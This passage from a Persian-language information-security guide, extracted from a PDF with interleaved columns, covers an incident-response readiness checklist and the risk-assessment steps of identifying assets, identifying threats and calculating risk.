‫‪65‬‬ ‫‪Computer Security Incident Response Team‬‬ ‫ﺟﻮﺳﺎﺯﻱ ﻣﺜﺒﺖ ﻳﺎ ﻣﻨﻔﻲ ﺷﻮﺩ‪.‬‬
‫‪١٤١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻣﺮﺍﺣﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ‬ ‫‪ o‬ﺁﻳﺎ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ‬
‫)ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ( ﺍﺯ ﻭﻗﻮﻉ ﺣﻮﺍﺩﺙ ﺍﺣﺘﻤـﺎﻟﻲ ﺗﻌﺮﻳـﻒ‬
‫ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺍﻳﻦ‬
‫ﺷﺪﻩ ﺍﺳﺖ؟‬
‫ﺳﺌﻮﺍﻻﺕ ﺍﺳﺎﺳﻲ ﺍﺳﺖ‪:‬‬
‫‪ o‬ﺁﻳﺎ ﺭﻭﺍﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺯﻣﺎﻥ ﺗﻤﺎﺱ ﺑﺎ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺟﻲ‬
‫‪ .۱‬ﺳﻌﻲ ﺩﺭ ﺣﻔﻆ ﭼﻪ ﭼﻴﺰﻱ ﺩﺍﺭﻡ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻘـﺪﺭ ﺑـﺮﺍﻱ‬ ‫ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤـﻚ ﻭ ﻓـﺮﺩﻱ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﻳـﻦ‬
‫ﻣﻦ ﺍﺭﺯﺵ ﺩﺍﺭﺩ؟‬ ‫ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫‪ .۲‬ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺩﺍﺭﻡ؟‬
‫‪ .۳‬ﺣﺎﺿــﺮﻡ ﭼﻘــﺪﺭ ﺯﻣــﺎﻥ‪ ،‬ﺗــﻼﺵ ﻭ ﺳــﺮﻣﺎﻳﻪ ﺑــﺮﺍﻱ ﺗــﺄﻣﻴﻦ‬ ‫ﺭﻭﺍﻟﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ‪:‬‬
‫ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻢ؟‬ ‫ﺁﻳﺎ ﻫﻤﺔ ﻛﺎﺭﻛﻨﺎﻥ ﻛﻠﻴﺪﻱ ﺑﺮﺍﻱ ﺑﻜﺎﺭ ﺑﺴﺘﻦ ﺭﻭﺍﻟﻬـﺎ‬ ‫‪o‬‬
‫‪٦٧‬‬ ‫ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ؟‬
‫ﺱ ﻓﺮﺁﻳﻨـﺪﻱ ﺑـﻪ ﻧـﺎﻡ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ‬
‫ﺍﻳﻦ ﺳﺆﺍﻻﺕ‪ ،‬ﺍﺳﺎ ﹺ‬
‫ﺷﻜﻞ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺑﺨﺶ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨـﺪ‬ ‫ﺁﻳــﺎ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ ﻭﺍﻗﻌ ـﹰﺎ ﺩﺭ ﻫﻤــﺔ ﺟﻠــﺴﺎﺕ‬ ‫‪o‬‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﻧﺪﺍﻧﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﭼﻪ ﻭ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ‬ ‫ﺁﻣﻮﺯﺷﻲ ﺣﻀﻮﺭ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؟‬
‫ﭼﻴﺰﻱ ﺣﻔﺎﻇﺖ ﺭﺍ ﺍﻋﻤﺎﻝ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻧﺨﻮﺍﻫﻴﺪ ﺗﻮﺍﻧـﺴﺖ ﮔﺎﻣﻬـﺎﻱ‬ ‫ﺁﻳــﺎ ﺩﻟﻴــﻞ ﺍﻧﺘﺨــﺎﺏ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ‪ ،‬ﺳــﻮﺍﺑﻖ‬ ‫‪o‬‬
‫ﺁﻧﺮﺍ ﺗـﺪﻭﻳﻦ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﻭﻗﺘـﻲ ﺧﻄـﺮﺍﺕ ﺭﺍ ﺷـﻨﺎﺧﺘﻴﺪ‪ ،‬ﻣـﻲﺗﻮﺍﻧﻴـﺪ‬ ‫ﺩﺭﺧﺸﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺩﻩ ﺍﺳﺖ؟‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﻨﻮﻧﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻃﺮﺣﻬﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﻩ‬ ‫ﺁﻳﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬ ‫‪o‬‬
‫ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺭﺍ ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔـﺮ ﺧﻄـﺮ ﻗﻄـﻊ ﺑـﺮﻕ‬ ‫ﺭﻭﺍﻥ ﺍﺳﺖ؟‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻬﻢ ﺍﺳﺖ‪ ،‬ﺑﺎﻳﺪ ﺍﻳﻦ ﺧﻄﺮ ﺭﺍ ﺑـﺎ‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻣﻨﺎﺑﻊ ﻓﻨﻲ‪:‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ ٦٨UPS‬ﻛﺎﻫﺶ ﺩﻫﻴﺪ‪.‬‬
‫ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻛﺮﺩﻥ ﻳﺎ ﭘﺎﻳـﺎﻥ ﺩﺍﺩﻥ ﺑـﻪ‬ ‫‪o‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺷﺎﻣﻞ ﺳﻪ ﻣﺮﺣﻠﺔ ﻛﻠﻴﺪﻱ ﺍﺳﺖ‪:‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺍﺭﺯﺵ ﺁﻧﻬﺎ‬ ‫‪.۱‬‬ ‫ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺕ ﺁﻏﺎﺯ ﻳﺎ ﭘﺎﻳﺎﻥ ﻃﺮﺡ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ‬ ‫‪o‬‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ‬ ‫‪.۲‬‬ ‫ﺑﺮﺭﺳﻲ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ‬ ‫‪.۳‬‬ ‫ﺁﻳﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﻛـﺸﻒ ﺗﻬـﺎﺟﻢ ﺭﻭﻱ‬ ‫‪o‬‬
‫ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻳـﻚ‬ ‫ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﻭ ﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ؟‬
‫ﺭﻭﺵ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﺑـﺴﻴﺎﺭ ﻣﻮﻓـﻖ ﺑـﻮﺩﻩ‪ ،‬ﺍﻳﺠـﺎﺩ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ‬ ‫ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻨﺎﺳﺎﻳﻲ‪ ٦٦‬ﻛﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﺪﻩ‬ ‫‪o‬‬
‫ﻲ ﺩﺭﻭﻥﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺷـﻤﺎ‬ ‫ﻛﺎﺭﮔﺎﻫﻬﺎﻱ ﺁﻣﻮﺯﺷ ﹺ‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺣﻤﻼﺕ ﻧﺎﺷﻨﺎﺧﺘﻪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ؟‬
‫ﺑﺎﻳــﺪ ﺍﺯ ﻛــﺎﺭﺑﺮﺍﻥ ﺁﮔــﺎﻩ ﺑﺨــﺸﻬﺎﻱ ﻣﺨﺘﻠــﻒ‪ ،‬ﻣــﺪﻳﺮﺍﻥ ﻣﻴــﺎﻧﻲ ﻭ‬ ‫ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺎﺧﺘﺎﺭ ﻻﻳﻪﺑﻨـﺪﻱﺷـﺪﻩ‬ ‫‪o‬‬
‫ﻣﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳـﻲ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺩﻋـﻮﺕ ﺑﻌﻤـﻞ ﺁﻭﺭﻳـﺪ؛ ﻭ ﻃـﻲ‬ ‫ﺣﻤﻼﺗﻲ ﻛﻪ ﺑـﻪ ﺷـﺒﻜﻪ ﻣـﻲﺷـﻮﻧﺪ ﺭﺍ ﻛـﺸﻒ ﻭ ﺍﺯ‬
‫ﺟﻠﺴﺎﺗﻲ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺍﻳـﻦ‬ ‫ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ؟‬
‫ﻓﺮﺁﻳﻨﺪ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﺘﺮﻱ ﺗﻬﻴﻪ‬ ‫ﺁﻳــﺎ ﺭﻭﻱ ﺷــﺒﻜﻪ ﻣــﻲﺗــﻮﺍﻥ ﺣﻤــﻼﺕ ﺭﺍ ﺑــﺴﺎﺩﮔﻲ‬ ‫‪o‬‬
‫ﻛﻨﻴﺪ‪ ،‬ﺑﻠﻜﻪ ﺁﮔﺎﻫﻲ ﺣﻀﺎﺭ ﺍﺯ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﻴﺰ ﺑﺎﻻﺗﺮ ﻣﻲﺑﺮﺩ‪.‬‬ ‫ﺗﻌﻘﻴﺐ ﻛﺮﺩ؟‬
‫ﻲ ﺍﻣﻨﻴــﺖ‪ ،‬ﻛﻠﻴــﺔ‬
‫ﻱ ﺭﺳــﻤ ﹺ‬‫ﺁﻳــﺎ ﺑــﺮ ﺍﺳــﺎﺱ ﻣﻤﻴــﺰ ﹺ‬ ‫‪o‬‬
‫ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺁﻣﺎﺭﻱ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﺑﺨﻮﺍﻫـﺪ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺭﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻣﻨﻴﺘﻲ ﻛﺎﻓﻲ ﻫﺴﺘﻨﺪ؟‬
‫ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﺎ ﻳﻚ ﺷـﺮﻛﺖ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ‬
‫ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ‬

‫‪67‬‬ ‫‪Risk Assessment‬‬


‫‪68‬‬ ‫‪Uninterruptible Power Supply‬‬ ‫‪66‬‬ ‫‪Detection Software‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٤٢‬‬

‫‪ o‬ﺣﺴﻦ ﻧﻴﺖ ﻣﺸﺘﺮﻳﺎﻥ؛‬ ‫ﺩﻭﻟﺘﻲ‪ ،‬ﻭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﻣﻬﻢ ﻛﺎﻓﻲ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺩﺭ ﭼﻨـﻴﻦ ﻣـﻮﺍﺭﺩﻱ‪،‬‬
‫ﻥ ﭘﺮﺩﺍﺯﺵ؛ ﻭ‬‫‪ o‬ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩ ‪‬‬ ‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣـﺸﺎﻭﺭﻩﺍﻱ ﻛـﻪ ﻣﺘﺨـﺼﺺ‬
‫‪ o‬ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﻴﻜﺮﺑﻨﺪﻱ‪.‬‬ ‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧـﺮﻡ‪-‬‬
‫ﻲ ﺍﺭﺯﻳﺎﺑﻲ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ‪.‬‬
‫ﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺨﺼﺼ ﹺ‬
‫ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺠﺎﻱ ﺗﻮﺟﻪ ﺻﺮﻑ ﺑﻪ ﺟﻨﺒﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ ،‬ﻧﮕﺮﺷـﻲ‬
‫ﻭﺳﻴﻌﺘﺮ ﺑﻪ ﺍﻗﻼﻡ ﻓﻮﻕ ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣﺮﺑﻮﻃﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ‪ .‬ﺍﮔـﺮ‬ ‫ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ‬
‫ﺷﻤﺎ ﻧﮕﺮﺍﻥ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻴﺪ ﻛﻪ ﻛﺴﻲ ﺑﺘﻮﺍﻧﺪ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺎﻟﻲ‬
‫ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺍﻗﻼﻣﻲ ﻛﻪ ﺑﻪ ﺣﻔﺎﻇﺖ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺷﻤﺎ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﺪ‪ ،‬ﺷﻴﻮﺓ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﻓﺮﺩ ﺑﻪ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﻃﺮﺡ ﻛـﺴﺐ ﻭ ﻛـﺎﺭ‪ ٦٩‬ﻭ ﺩﺍﻧـﺶ ﻋﺮﻓـﻲ‬
‫)ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﻧﺴﺨﻪﻫﺎﻱ ﻛﺎﻏﺬﻱ ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﭼـﻪ ﺍﺯ‬
‫ﺷــﻤﺎ ﺗﻨﻈــﻴﻢ ﺷــﻮﺩ‪ .‬ﺍﻳــﻦ ﻓﺮﺁﻳﻨــﺪ ﻧﻴﺎﺯﻣﻨــﺪ ﺁﮔــﺎﻫﻲ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ‬
‫ﻃﺮﻳﻖ ﺩﺳﺘﺮﺳﻲ ﻣﺴﺘﻘﻴﻢ ﺑﻪ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ( ﺍﺯ ﺍﻫﻤﻴـﺖ ﺧﺎﺻـﻲ‬ ‫ﻛﺎﺭﺑﺮﺩﻱ‪ ،‬ﺩﺭﻙ ﻛﺎﻣﻞ ﺗﺴﻬﻴﻼﺕ‪ ،‬ﻭ ﻋﻠـﻢ ﺑـﻪ ﮔـﺴﺘﺮﺓ ﭘﻮﺷـﺶ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﻭ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺑﺎﻳـﺪ‬
‫ﺑﻴﻤﺔ ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﺍﻗﻼﻡ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻠﻤـﻮﺱ )ﻣﺜـﻞ‬
‫ﻣﺴﺪﻭﺩ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ‪ ،‬ﺻﻔﺤﺎﺕ ﻧﻤﺎﻳﺶ‪ ،‬ﻛﺎﺑﻠﻬﺎﻱ ﺷﺒﻜﻪ‪ ،‬ﺗﺠﻬﻴﺰﺍﺕ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪،‬‬
‫ﻭ ﻛﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ( ﻭ ﻳﺎ ﻏﻴﺮﻣﻠﻤﻮﺱ )ﻣﺜﻞ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ‪ ،‬ﺭﻣـﺰ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ‬ ‫ﻋﺒﻮﺭ ﺍﺻﻠﻲ‪ ،‬ﺗﻮﺍﻧﺎﻳﻲ ﺍﺩﺍﻣﺔ ﭘﺮﺩﺍﺯﺵ‪ ،‬ﻓﻬﺮﺳﺖ ﻣـﺸﺘﺮﻳﺎﻥ‪ ،‬ﻭﺟﻬـﺔ ﻋﻤـﻮﻣﻲ‪ ،‬ﻭ‬
‫ﻣﺮﺣﻠﺔ ﺑﻌﺪﻱ ﺗﻌﻴﻴﻦ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺑﺮﺍﻱ ﺩﺍﺭﺍﻳـﻲ‬ ‫ﺍﻋﺘﺒﺎﺭ ﺩﺭ ﺻﻨﻌﺖ( ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﻫﺮ ﭼﻴـﺰﻱ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺤﻴﻄـﻲ ﻫـﺴﺘﻨﺪ ﻭ ﺷـﺎﻣﻞ‬ ‫ﺷﻤﺎ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪ .‬ﺑـﺮﺍﻱ ﺗـﺸﺨﻴﺺ ﺍﺭﺯﺷـﻤﻨﺪ‬
‫ﺁﺗﺶﺳﻮﺯﻱ‪ ،‬ﺯﻟﺰﻟﻪ‪ ،‬ﺍﻧﻔﺠﺎﺭ ﻭ ﺳﻴﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﺑﺎﻳـﺪ‬ ‫ﺑﻮﺩﻥ ﻫﺮ ﻣﻮﺭﺩ‪ ،‬ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﺨﺮﻳﺐ ﻳﺎ ﻓﻘـﺪﺍﻥ‬
‫ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ ﺍﻣﺎ ﻣﻤﻜﻦ ﻫﻢ ﺑﺎﺷﻨﺪ؛ ﻣﺜﻞ ﺑـﺮﻭﺯ ﻧﻘـﺺ‬ ‫ﺁﻥ‪ ،‬ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺯﻣﺎﻧﻲ ﻭ ﭘﻮﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮ ﻳﺎ ﺟـﺎﻳﮕﺰﻳﻨﻲ ﺁﻥ‬
‫ﻛﻠﻲ ﺩﺭ ﺳﺎﺧﺘﻤﺎﻥ ﻳﺎ ﭘﻴﺪﺍﺷﺪﻥ ﻣﻮﺍﺩ ﺁﺗـﺸﺰﺍ ﺩﺭ ﺩﻳﻮﺍﺭﻫـﺎﻱ ﺍﺗـﺎﻕ‬ ‫ﺑﻪ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻳﻜﻪ ﺑﻄﻮﺭ ﺣﺘﻢ ﺑﺎﻳـﺪ ﺩﺭ‬
‫ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻧﻪﭼﻨﺪﺍﻥ ﻛﻮﺗﺎﻩ ﻭﺍﺩﺍﺭ‬ ‫ﻓﻬﺮﺳﺖ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻤﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺑﻪ ﺗﺨﻠﻴﺔ ﺍﺗﺎﻕ ﻧﻤﺎﻳﺪ‪ .‬ﺳﺎﻳﺮ ﺗﻬﺪﻳﺪﺍﺕ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺍﻓـﺮﺍﺩ ﺧـﺎﺭﺝ‬
‫ﺳﺎﺯﻣﺎﻥ ﻧﺸﺄﺕ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﺩﺳـﺘﻪ ﺍﺯ‬ ‫ﻣﻮﺍﺭﺩ ﻣﻠﻤﻮﺱ‪:‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ‪:‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ؛‬ ‫‪o‬‬
‫ﺑﻴﻤﺎﺭﻱ ﺍﻓﺮﺍﺩ ﻛﻠﻴﺪﻱ؛‬ ‫•‬ ‫ﺩﺍﺩﻩﻫﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ؛‬ ‫‪o‬‬
‫ﺑﻴﻤﺎﺭﻱ ﻫﻤﺰﻣﺎﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﻛﻨـﺎﻥ )ﻧﻈﻴـﺮ ﺑﻴﻤﺎﺭﻳﻬـﺎﻱ‬ ‫•‬ ‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﺑﺎﻳﮕﺎﻧﻲ؛‬ ‫‪o‬‬
‫ﻣﺴﺮﻱ ﻣﺜﻞ ﺁﻧﻔﻮﻻﻧﺰﺍ(؛‬ ‫ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ‪ ،‬ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﻛﺘﺎﺑﻬﺎ؛‬ ‫‪o‬‬
‫ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﭘﺮﺳﻨﻞ ﻛﻠﻴﺪﻱ )ﻣـﺮﮒ‪ ،‬ﺑﺎﺯﻧﺸـﺴﺘﮕﻲ‪ ،‬ﭘﺎﻳـﺎﻥ‬ ‫•‬ ‫ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘﻲ؛‬ ‫‪o‬‬
‫ﻳﺎﻓﺘﻦ ﺩﻭﺭﺓ ﻛﺎﺭﻱ(؛‬ ‫ﻭﺳﺎﻳﻞ ﺗﻮﺯﻳﻊ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ؛‬ ‫‪o‬‬
‫ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻳﺎ ﺷﺒﻜﻪ؛‬ ‫•‬ ‫ﻭﺳﺎﻳﻞ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﻛﺎﺑﻞﻛﺸﻲﻫﺎ؛‬ ‫‪o‬‬
